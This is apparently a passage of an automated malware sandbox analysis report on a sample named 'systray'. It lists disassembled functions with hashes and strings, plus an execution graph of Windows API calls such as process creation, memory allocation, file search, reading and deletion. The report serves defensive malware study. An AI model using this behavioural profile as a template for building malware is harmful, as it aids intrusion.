                                  • Instruction Fuzzy Hash: E1513971A043187ADF20FFA5DC86FE977B8AF05310F1400A9E605A7291E771EE45AF51
                                  Function 00FBB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 54d4958207975169799cabb78e135a33163447426b1131e5b8e0dd2fab1e1522
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: E581C470E052499EDF24CF6AC8517FEBBB6AF85320F284259E851A7291CBB49C41EF50
                                  Function 010220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: fec2fc5ddfe5cb75eb90b103c62bf09181af38a70566d41a16382a1c5fb69736
                                  • Instruction ID: 872098e31c634487b7bb00f52ee0eead3270d56ff71829f758905bdc604464c5
                                  • Opcode Fuzzy Hash: fec2fc5ddfe5cb75eb90b103c62bf09181af38a70566d41a16382a1c5fb69736
                                  • Instruction Fuzzy Hash: 612183BAE00129ABDB10DEA9CD51EEEBBE8AF54740F140156E945D3201EB34DA019BA1
                                  Function 00F9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 00FE031E
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FE02BD
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FE02E7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 96bfa7008e445c06652915bbba86322f53a02ef31d975a9c900004fbe943ee54
                                  • Instruction ID: d5b58cadb1d22e8ec2493cb1f68cb802ee3f11cfb811ac1a1832894b9a318d13
                                  • Opcode Fuzzy Hash: 96bfa7008e445c06652915bbba86322f53a02ef31d975a9c900004fbe943ee54
                                  • Instruction Fuzzy Hash: 8DE1B431A047419FEB25CF29C845B6AB7E0BF84324F140A2DF595CB2E1DB74D949EB42
                                  Function 00FABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 00FE7BAC
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00FE7B7F
                                  • RTL: Resource at %p, xrefs: 00FE7B8E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: cb8cc05c6928c29f6a8695e980cc4523e4dbb06fdd65222f8c719b5c8be0cd0f
                                  • Instruction ID: 84c1d81cbaa9502878d58b7934a07f313ff7909011d2d68d492f369ad1afedcd
                                  • Opcode Fuzzy Hash: cb8cc05c6928c29f6a8695e980cc4523e4dbb06fdd65222f8c719b5c8be0cd0f
                                  • Instruction Fuzzy Hash: 2B4122757047429FC720DE25CC41B6AB7E5EF89720F140A2DF95ADB382DB31E805AB91
                                  Function 00FAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE728C
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 00FE72C1
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00FE7294
                                  • RTL: Resource at %p, xrefs: 00FE72A3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: d56ca397c6ebcbb7f11232e56002621061af17e53401dc17feafc4f4ac3ac3d6
                                  • Instruction ID: c0a828e61b9c877b6f79dc7654f3111ef17915075d1a9f0488259abf712c9b17
                                  • Opcode Fuzzy Hash: d56ca397c6ebcbb7f11232e56002621061af17e53401dc17feafc4f4ac3ac3d6
                                  • Instruction Fuzzy Hash: 76410571B04346ABC720EE26CC41F66B7A5FF45720F140619FE55E7282DB25E806BBD1
                                  Function 01022300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: f7d360677afb628bef04678ecb17646536b2fd4c4a1ed2bf49f399992521c607
                                  • Instruction ID: f84b63d46af8433d21bea8f45b8f6653bc93a347bcd1b82422e4583a08683b0c
                                  • Opcode Fuzzy Hash: f7d360677afb628bef04678ecb17646536b2fd4c4a1ed2bf49f399992521c607
                                  • Instruction Fuzzy Hash: 07318472A002299FDB60DE69CC41BEEB7F8EF44610F454595E989E3241EB30AA459FA0
                                  Function 00FB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 766c9f00b9988cf66362a79210f487c4e612ee8f32e0f2b732813fea367fbb6e
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: FB919171E083069ADB24FE6BC8816FEB7A5AFC4360F24451AE855A7280DB34CD41EF54
                                  Function 00F79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 5f7fae23f1fc6478667ad0c9bd46e64965c4e6c4a63b6eab8ea115ab807ca6e0
                                  • Instruction ID: ac91588ce284040676195d3ee387550571408f79f7ed1d3789b9b6b3ae0aa2cc
                                  • Opcode Fuzzy Hash: 5f7fae23f1fc6478667ad0c9bd46e64965c4e6c4a63b6eab8ea115ab807ca6e0
                                  • Instruction Fuzzy Hash: AA812972D002699BDB71DB54CC45BEAB7B4AF08710F0441EAE90DB7280E7749E80DFA1
                                  Function 00FFCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00FFCFBD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: @$@4Qw@4Qw
                                  • API String ID: 4062629308-2383119779
                                  • Opcode ID: 181b30cabb74c02fa5f19791626f8f9d38da1a72af8bc92bd7e9d3d082196106
                                  • Instruction ID: 726eb88b8d75b46acd732cad8f8ba828040412153047b41c55c7426277e5af6d
                                  • Opcode Fuzzy Hash: 181b30cabb74c02fa5f19791626f8f9d38da1a72af8bc92bd7e9d3d082196106
                                  • Instruction Fuzzy Hash: 4E418F72900228DFCB219F95C941ABDBBF9FF45B10F00402AEA45DB265DB399901EBA1

                                  Execution Graph

                                  Execution Coverage:2.4%
                                  Dynamic/Decrypted Code Coverage:4.2%
                                  Signature Coverage:1.6%
                                  Total number of Nodes:448
                                  Total number of Limit Nodes:75
                                  execution_graph 99108 32395e0 99109 32395ef 99108->99109 99110 323962d 99109->99110 99111 323961a CreateThread 99109->99111 99112 324f120 99113 324f13d 99112->99113 99116 3243e50 99113->99116 99115 324f15b 99117 3243e74 99116->99117 99118 3243e7b 99117->99118 99119 3243eb0 LdrLoadDll 99117->99119 99118->99115 99119->99118 99122 32507af 99123 32507b4 99122->99123 99124 3250738 99122->99124 99125 3250744 99124->99125 99126 3250758 99124->99126 99127 32578e0 NtClose 99125->99127 99133 32578e0 99126->99133 99129 325074d 99127->99129 99130 3250761 99136 32598d0 RtlAllocateHeap 99130->99136 99132 325076c 99134 32578fa 99133->99134 99135 325790b NtClose 99134->99135 99135->99130 99136->99132 99137 324b7f0 99138 324b819 99137->99138 99139 324b91c 99138->99139 99140 324b8be FindFirstFileW 99138->99140 99140->99139 99141 324b8d9 99140->99141 99142 324b903 FindNextFileW 99141->99142 99142->99141 99143 324b915 FindClose 99142->99143 99143->99139 99145 32450f0 99147 3245120 99145->99147 99150 3247510 99145->99150 99149 324514c 99147->99149 99154 3247490 99147->99154 99151 3247523 99150->99151 99161 3256e70 99151->99161 99153 324754e 99153->99147 99155 32474d4 99154->99155 99160 32474f5 99155->99160 99167 3256c70 99155->99167 99157 32474e5 99158 3247501 99157->99158 99159 32578e0 NtClose 99157->99159 99158->99147 99159->99160 99160->99147 99162 3256ee0 99161->99162 99163 3256e91 99161->99163 99166 5242dd0 LdrInitializeThunk 99162->99166 99163->99153 99164 3256f05 99164->99153 99166->99164 99168 3256cdf 99167->99168 99170 3256c91 99167->99170 99172 5244650 LdrInitializeThunk 99168->99172 99169 3256d04 99169->99157 99170->99157 99172->99169 99173 3256db0 99174 3256e31 99173->99174 99176 3256dd1 99173->99176 99178 5242ee0 LdrInitializeThunk 99174->99178 99175 3256e62 99178->99175 99179 3242138 99180 3242155 99179->99180 99183 3245960 99180->99183 99182 3242160 99184 3245993 99183->99184 99185 32459b7 99184->99185 99190 3257460 99184->99190 99185->99182 99187 32459da 99187->99185 99188 32578e0 NtClose 99187->99188 99189 3245a5a 99188->99189 99189->99182 99191 325747a 99190->99191 99194 5242ca0 LdrInitializeThunk 99191->99194 99192 32574a6 99192->99187 99194->99192 99195 3246a38 99196 3246a4d 99195->99196 99197 32469da 99195->99197 99199 3246a12 99197->99199 99200 324a560 99197->99200 99201 324a586 99200->99201 99202 324a79f 99201->99202 99227 3257ce0 99201->99227 99202->99199 99204 324a5f9 99204->99202 99230 325a9c0 99204->99230 99206 324a612 99206->99202 99207 324a6e3 99206->99207 99236 3256f60 99206->99236 99209 3245070 LdrInitializeThunk 99207->99209 99215 324a702 99207->99215 99209->99215 99211 324a677 99211->99202 99212 324a6cb 99211->99212 99213 324a6a9 99211->99213 99240 3245070 99211->99240 99216 3247510 LdrInitializeThunk 99212->99216 99258 3253110 LdrInitializeThunk 99213->99258 99214 324a787 99217 3247510 LdrInitializeThunk 99214->99217 99215->99214 99243 3256b30 99215->99243 99221 324a6d9 99216->99221 99222 324a795 99217->99222 99221->99199 99222->99199 99223 324a75e 99248 3256bd0 99223->99248 99225 324a778 99253 3256d10 99225->99253 99228 3257cfd 99227->99228 99229 3257d0b CreateProcessInternalW 99228->99229 99229->99204 99231 325a930 99230->99231 99232 325a98d 99231->99232 99259 3259890 99231->99259 99232->99206 99234 325a96a 99262 32597b0 99234->99262 99237 3256f7d 99236->99237 99271 5242c0a 99237->99271 99238 324a66e 99238->99207 99238->99211 99274 3257120 99240->99274 99242 32450ae 99242->99213 99244 3256ba2 99243->99244 99245 3256b54 99243->99245 99280 52439b0 LdrInitializeThunk 99244->99280 99245->99223 99246 3256bc7 99246->99223 99249 3256c3f 99248->99249 99250 3256bf1 99248->99250 99281 5244340 LdrInitializeThunk 99249->99281 99250->99225 99251 3256c64 99251->99225 99254 3256d82 99253->99254 99256 3256d34 99253->99256 99282 5242fb0 LdrInitializeThunk 99254->99282 99255 3256da7 99255->99214 99256->99214 99258->99212 99265 3257c00 99259->99265 99261 32598ab 99261->99234 99268 3257c50 99262->99268 99264 32597c9 99264->99232 99266 3257c1a 99265->99266 99267 3257c2b RtlAllocateHeap 99266->99267 99267->99261 99269 3257c6d 99268->99269 99270 3257c7e RtlFreeHeap 99269->99270 99270->99264 99272 5242c1f LdrInitializeThunk 99271->99272 99273 5242c11 99271->99273 99272->99238 99273->99238 99275 32571c2 99274->99275 99276 3257144 99274->99276 99279 5242d10 LdrInitializeThunk 99275->99279 99276->99242 99277 3257207 99277->99242 99279->99277 99280->99246 99281->99251 99282->99255 99283 3249004 99284 3248f98 99283->99284 99289 3249007 99283->99289 99285 3259890 RtlAllocateHeap 99284->99285 99286 3248fab 99284->99286 99285->99286 99287 3248fc1 99286->99287 99288 32597b0 RtlFreeHeap 99286->99288 99288->99287 99290 3239640 99293 3239917 99290->99293 99291 3239e50 99293->99291 99294 3259440 99293->99294 99295 3259466 99294->99295 99300 3233f70 99295->99300 99297 3259472 99298 32594a3 99297->99298 99303 3253f10 99297->99303 99298->99291 99307 3242b90 99300->99307 99302 3233f7d 99302->99297 99304 3253f6a 99303->99304 99306 3253f77 99304->99306 99318 32410b0 99304->99318 99306->99298 99308 3242ba7 99307->99308 99310 3242bc0 99308->99310 99311 3258330 99308->99311 99310->99302 99313 3258348 99311->99313 99312 325836c 99312->99310 99313->99312 99314 3256f60 LdrInitializeThunk 99313->99314 99315 32583be 99314->99315 99316 32597b0 RtlFreeHeap 99315->99316 99317 32583d4 99316->99317 99317->99310 99319 32410eb 99318->99319 99334 32472a0 99319->99334 99321 32410f3 99322 324139f 99321->99322 99323 3259890 RtlAllocateHeap 99321->99323 99322->99306 99324 3241109 99323->99324 99325 3259890 RtlAllocateHeap 99324->99325 99326 324111a 99325->99326 99327 3259890 RtlAllocateHeap 99326->99327 99328 3241128 99327->99328 99333 32411b0 99328->99333 99349 32460c0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99328->99349 99330 3243e50 LdrLoadDll 99331 3241362 99330->99331 99345 3256630 99331->99345 99333->99330 99335 32472cc 99334->99335 99350 3247190 99335->99350 99338 3247311 99340 324732d 99338->99340 99343 32578e0 NtClose 99338->99343 99339 32472f9 99341 3247304 99339->99341 99342 32578e0 NtClose 99339->99342 99340->99321 99341->99321 99342->99341 99344 3247323 99343->99344 99344->99321 99346 325668a 99345->99346 99348 3256697 99346->99348 99361 32413b0 99346->99361 99348->99322 99349->99333 99351 3247286 99350->99351 99352 32471aa 99350->99352 99351->99338 99351->99339 99356 3257000 99352->99356 99355 32578e0 NtClose 99355->99351 99357 325701a 99356->99357 99360 52435c0 LdrInitializeThunk 99357->99360 99358 324727a 99358->99355 99360->99358 99363 32413d0 99361->99363 99379 3247570 99361->99379 99372 32418a8 99363->99372 99383 32500d0 99363->99383 99365 324142b 99365->99372 99386 32565a0 99365->99386 99367 32415b2 99390 325a890 99367->99390 99369 32415cb 99370 325a9c0 2 API calls 99369->99370 99373 32415e0 99370->99373 99371 3247510 LdrInitializeThunk 99375 3241605 99371->99375 99372->99348 99373->99375 99395 3240070 99373->99395 99375->99371 99375->99372 99377 3240070 LdrInitializeThunk 99375->99377 99376 3247510 LdrInitializeThunk 99378 3241739 99376->99378 99377->99375 99378->99375 99378->99376 99380 324757d 99379->99380 99381 32475a2 99380->99381 99382 324759b SetErrorMode 99380->99382 99381->99363 99382->99381 99399 3259720 99383->99399 99385 32500f1 99385->99365 99387 32565fa 99386->99387 99389 325660f 99387->99389 99406 32418c0 99387->99406 99389->99367 99391 325a8a6 99390->99391 99392 325a8a0 99390->99392 99393 3259890 RtlAllocateHeap 99391->99393 99392->99369 99394 325a8cc 99393->99394 99394->99369 99396 324008c 99395->99396 99412 3257b60 99396->99412 99402 3257a40 99399->99402 99401 3259751 99401->99385 99403 3257ac7 99402->99403 99405 3257a61 99402->99405 99404 3257add NtAllocateVirtualMemory 99403->99404 99404->99401 99405->99401 99409 32418e4 99406->99409 99410 32417b6 99406->99410 99407 3247510 LdrInitializeThunk 99407->99410 99408 32418a8 99408->99389 99409->99389 99410->99407 99410->99408 99411 3240070 LdrInitializeThunk 99410->99411 99411->99410 99413 3257b7d 99412->99413 99416 5242c70 LdrInitializeThunk 99413->99416 99414 3240092 99414->99378 99416->99414 99417 3245180 99418 32451b6 99417->99418 99419 3256f60 LdrInitializeThunk 99417->99419 99422 3257980 99418->99422 99419->99418 99421 32451cb 99423 3257a04 99422->99423 99424 32579a4 99422->99424 99427 5242e80 LdrInitializeThunk 99423->99427 99424->99421 99425 3257a35 99425->99421 99427->99425 99428 324e880 99429 324e8e4 99428->99429 99430 3245960 2 API calls 99429->99430 99432 324ea0d 99430->99432 99431 324ea14 99432->99431 99457 3245a70 99432->99457 99434 324ebb3 99435 324ea90 99435->99434 99436 324ebc2 99435->99436 99461 324e660 99435->99461 99437 32578e0 NtClose 99436->99437 99439 324ebcc 99437->99439 99440 324eac5 99440->99436 99441 324ead0 99440->99441 99442 3259890 RtlAllocateHeap 99441->99442 99443 324eaf9 99442->99443 99444 324eb02 99443->99444 99445 324eb18 99443->99445 99447 32578e0 NtClose 99444->99447 99470 324e550 CoInitialize 99445->99470 99449 324eb0c 99447->99449 99448 324eb26 99472 32573c0 99448->99472 99451 324eba2 99452 32578e0 NtClose 99451->99452 99453 324ebac 99452->99453 99454 32597b0 RtlFreeHeap 99453->99454 99454->99434 99455 324eb44 99455->99451 99456 32573c0 LdrInitializeThunk 99455->99456 99456->99455 99458 3245a95 99457->99458 99476 3257250 99458->99476 99462 324e67c 99461->99462 99463 3243e50 LdrLoadDll 99462->99463 99465 324e69a 99463->99465 99464 324e6a3 99464->99440 99465->99464 99466 3243e50 LdrLoadDll 99465->99466 99467 324e76e 99466->99467 99468 3243e50 LdrLoadDll 99467->99468 99469 324e7cb 99467->99469 99468->99469 99469->99440 99471 324e5b5 99470->99471 99471->99448 99473 32573da 99472->99473 99481 5242ba0 LdrInitializeThunk 99473->99481 99474 325740a 99474->99455 99477 325726a 99476->99477 99480 5242c60 LdrInitializeThunk 99477->99480 99478 3245b09 99478->99435 99480->99478 99481->99474 99482 324a080 99487 3249db0 99482->99487 99484 324a08d 99501 3249a50 99484->99501 99486 324a0a3 99488 3249dd5 99487->99488 99512 3247760 99488->99512 99491 3249f12 99491->99484 99493 3249f29 99493->99484 99494 3249f20 99494->99493 99496 324a011 99494->99496 99527 32494b0 99494->99527 99497 324a069 99496->99497 99536 3249810 99496->99536 99499 32597b0 RtlFreeHeap 99497->99499 99500 324a070 99499->99500 99500->99484 99502 3249a66 99501->99502 99505 3249a71 99501->99505 99503 3259890 RtlAllocateHeap 99502->99503 99503->99505 99504 3249a87 99504->99486 99505->99504 99506 3247760 GetFileAttributesW 99505->99506 99507 3249d7e 99505->99507 99510 32494b0 RtlFreeHeap 99505->99510 99511 3249810 RtlFreeHeap 99505->99511 99506->99505 99508 3249d97 99507->99508 99509 32597b0 RtlFreeHeap 99507->99509 99508->99486 99509->99508 99510->99505 99511->99505 99513 324777e 99512->99513 99514 3247785 GetFileAttributesW 99513->99514 99515 3247790 99513->99515 99514->99515 99515->99491 99516 3251d50 99515->99516 99517 3251d5e 99516->99517 99518 3251d65 99516->99518 99517->99494 99519 3243e50 LdrLoadDll 99518->99519 99520 3251d9a 99519->99520 99521 3251da9 99520->99521 99540 3251820 LdrLoadDll 99520->99540 99523 3259890 RtlAllocateHeap 99521->99523 99526 3251f44 99521->99526 99525 3251dc2 99523->99525 99524 32597b0 RtlFreeHeap 99524->99526 99525->99524 99525->99526 99526->99494 99528 32494d6 99527->99528 99541 324ccb0 99528->99541 99530 324953d 99532 32496c0 99530->99532 99533 324955b 99530->99533 99531 32496a5 99531->99494 99532->99531 99534 3249370 RtlFreeHeap 99532->99534 99533->99531 99546 3249370 99533->99546 99534->99532 99537 3249836 99536->99537 99538 324ccb0 RtlFreeHeap 99537->99538 99539 32498b2 99538->99539 99539->99496 99540->99521 99543 324ccb8 99541->99543 99542 324ccd3 99542->99530 99543->99542 99544 32597b0 RtlFreeHeap 99543->99544 99545 324cd0c 99544->99545 99545->99530 99547 3249386 99546->99547 99550 324cd20 99547->99550 99549 324948c 99549->99533 99551 324cd44 99550->99551 99552 324cddc 99551->99552 99553 32597b0 RtlFreeHeap 99551->99553 99552->99549 99553->99552 99559 3257600 99560 32576a9 99559->99560 99562 3257625 99559->99562 99561 32576bf NtCreateFile 99560->99561 99563 323af10 99564 323c581 99563->99564 99565 3259720 NtAllocateVirtualMemory 99563->99565 99565->99564 99566 32467d0 99567 32467ec 99566->99567 99575 324683f 99566->99575 99569 32578e0 NtClose 99567->99569 99567->99575 99568 3246968 99570 3246807 99569->99570 99576 3245bf0 NtClose LdrInitializeThunk LdrInitializeThunk 99570->99576 99572 3246942 99572->99568 99578 3245dc0 NtClose LdrInitializeThunk LdrInitializeThunk 99572->99578 99575->99568 99577 3245bf0 NtClose LdrInitializeThunk LdrInitializeThunk 99575->99577 99576->99575 99577->99572 99578->99568 99579 3246410 99580 324643a 99579->99580 99583 3247340 99580->99583 99582 3246464 99584 324735d 99583->99584 99590 3257050 99584->99590 99586 32473ad 99587 32473b4 99586->99587 99588 3257120 LdrInitializeThunk 99586->99588 99587->99582 99589 32473dd 99588->99589 99589->99582 99591 32570e0 99590->99591 99592 3257074 99590->99592 99595 5242f30 LdrInitializeThunk 99591->99595 99592->99586 99593 3257119 99593->99586 99595->99593 99596 3250291 99597 325029c 99596->99597 99609 3257760 99597->99609 99599 32502b2 99600 32502e5 99599->99600 99601 32502d0 99599->99601 99603 32578e0 NtClose 99600->99603 99602 32578e0 NtClose 99601->99602 99604 32502d9 99602->99604 99606 32502ee 99603->99606 99605 325031a 99606->99605 99607 32597b0 RtlFreeHeap 99606->99607 99608 325030e 99607->99608 99610 32577fc 99609->99610 99612 3257784 99609->99612 99611 3257812 NtReadFile 99610->99611 99611->99599 99612->99599 99613 5242ad0 LdrInitializeThunk 99614 3256f10 99615 3256f2a 99614->99615 99618 5242df0 LdrInitializeThunk 99615->99618 99616 3256f52 99618->99616 99624 32548d0 99625 325492a 99624->99625 99627 3254937 99625->99627 99628 3252460 99625->99628 99629 3259720 NtAllocateVirtualMemory 99628->99629 99630 32524a1 99629->99630 99631 3243e50 LdrLoadDll 99630->99631 99633 32525a6 99630->99633 99634 32524e7 99631->99634 99632 3252520 Sleep 99632->99634 99633->99627 99634->99632 99634->99633 99640 3257850 99641 3257871 99640->99641 99642 32578b9 99640->99642 99643 32578cf NtDeleteFile 99642->99643 99644 3250a90 99649 3250a9f 99644->99649 99645 3250b25 99646 3250ae6 99647 32597b0 RtlFreeHeap 99646->99647 99648 3250af2 99647->99648 99649->99645 99649->99646 99650 3250b20 99649->99650 99651 32597b0 RtlFreeHeap 99650->99651 99651->99645 99652 3242a9c 99653 3247190 2 API calls 99652->99653 99655 3242aac 99653->99655 99654 3242ac1 99655->99654 99656 32578e0 NtClose 99655->99656 99656->99654 99657 3247bde 99658 3247be3 99657->99658 99659 3247ba2 99658->99659 99661 3246620 LdrInitializeThunk LdrInitializeThunk 99658->99661 99661->99659 99662 32405db PostThreadMessageW 99663 32405ed 99662->99663

                                  Executed Functions

                                  Function 03239640 Relevance: 31.7, Strings: 25, Instructions: 417COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 26 3239640-3239910 27 3239917-3239927 26->27 27->27 28 3239929 27->28 29 3239930-3239934 28->29 30 3239936-323995b 29->30 31 323995d-3239964 29->31 30->29 32 323996f-3239976 31->32 33 32399b5-32399c2 32->33 34 3239978-32399b3 32->34 33->33 35 32399c4-32399d5 33->35 34->32 37 32399e6-32399f2 35->37 38 32399f4-3239a07 37->38 39 3239a09 37->39 38->37 41 3239a10-3239a20 39->41 41->41 42 3239a22-3239a29 41->42 43 3239a53-3239a5d 42->43 44 3239a2b-3239a3d 42->44 45 3239a91-3239a9b 43->45 46 3239a5f-3239a7e 43->46 47 3239a44-3239a46 44->47 48 3239a3f-3239a43 44->48 53 3239aac-3239ab5 45->53 51 3239a80-3239a89 46->51 52 3239a8f 46->52 49 3239a51 47->49 50 3239a48-3239a4e 47->50 48->47 49->42 50->49 51->52 52->43 54 3239ab7-3239ac6 53->54 55 3239ac8-3239ad1 53->55 54->53 57 3239ad7-3239ae1 55->57 58 3239d1c-3239d26 55->58 60 3239af2-3239afb 57->60 59 3239d37-3239d40 58->59 61 3239d42-3239d55 59->61 62 3239d57-3239d5e 59->62 63 3239b12-3239b2b 60->63 64 3239afd-3239b10 60->64 61->59 67 3239d83-3239d8d 62->67 68 3239d60-3239d76 62->68 63->63 65 3239b2d-3239b37 63->65 64->60 70 3239b48-3239b52 65->70 73 3239d9e-3239da5 67->73 71 3239d81 68->71 72 3239d78-3239d7e 68->72 74 3239b54-3239b66 70->74 75 3239b68-3239b6c 70->75 71->62 72->71 76 3239dd0-3239dd7 73->76 77 3239da7-3239dce 73->77 74->70 82 3239b6e-3239b8b 75->82 83 3239b8d-3239b97 75->83 78 3239e50-3239e5a 76->78 79 3239dd9-3239de0 76->79 77->73 87 3239e6b-3239e74 78->87 84 3239de2-3239e0a 79->84 85 3239e0c-3239e16 79->85 82->75 86 3239ba8-3239bb4 83->86 84->79 88 3239e27-3239e33 85->88 89 3239bd2-3239bea 86->89 90 3239bb6-3239bc2 86->90 91 3239e76-3239e83 87->91 92 3239e85-3239e8e 87->92 93 3239e35-3239e3e 88->93 94 3239e4b call 3259440 88->94 98 3239c59-3239c63 89->98 99 3239bec-3239bf6 89->99 95 3239bd0 90->95 96 3239bc4-3239bca 90->96 91->87 100 3239e40-3239e43 93->100 101 3239e49 93->101 94->78 95->86 96->95 102 3239c74-3239c7d 98->102 105 3239c07-3239c10 99->105 100->101 108 3239e18-3239e21 101->108 109 3239c9b-3239ca5 102->109 110 3239c7f-3239c8b 102->110 106 3239c12-3239c24 105->106 107 3239c26-3239c2d 105->107 106->105 111 3239c54 107->111 112 3239c2f-3239c52 107->112 108->88 116 3239cb6-3239cbf 109->116 114 3239c99 110->114 115 3239c8d-3239c93 110->115 111->58 112->107 114->102 115->114 118 3239cc1-3239ccd 116->118 119 3239ccf-3239cd9 116->119 118->116 120 3239cea-3239cf6 119->120 122 3239cf8-3239d0b 120->122 123 3239d0d-3239d17 120->123 122->120 123->55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $$0$3$3z$7v$?-$A$Ba$CI$SP$Y$\?$a7$dX$g$i$i'$j$ja$q$r$7$7$m$s
                                  • API String ID: 0-2166280123
                                  • Opcode ID: 125bdcef92139b672f29147a14eddf3ce1b116448e257810250ce686a0b72e70
                                  • Instruction ID: 69e045d13d432e34ee72d5410ccca58b6795871eed5caf8b63ce6891ccbf3d87
                                  • Opcode Fuzzy Hash: 125bdcef92139b672f29147a14eddf3ce1b116448e257810250ce686a0b72e70
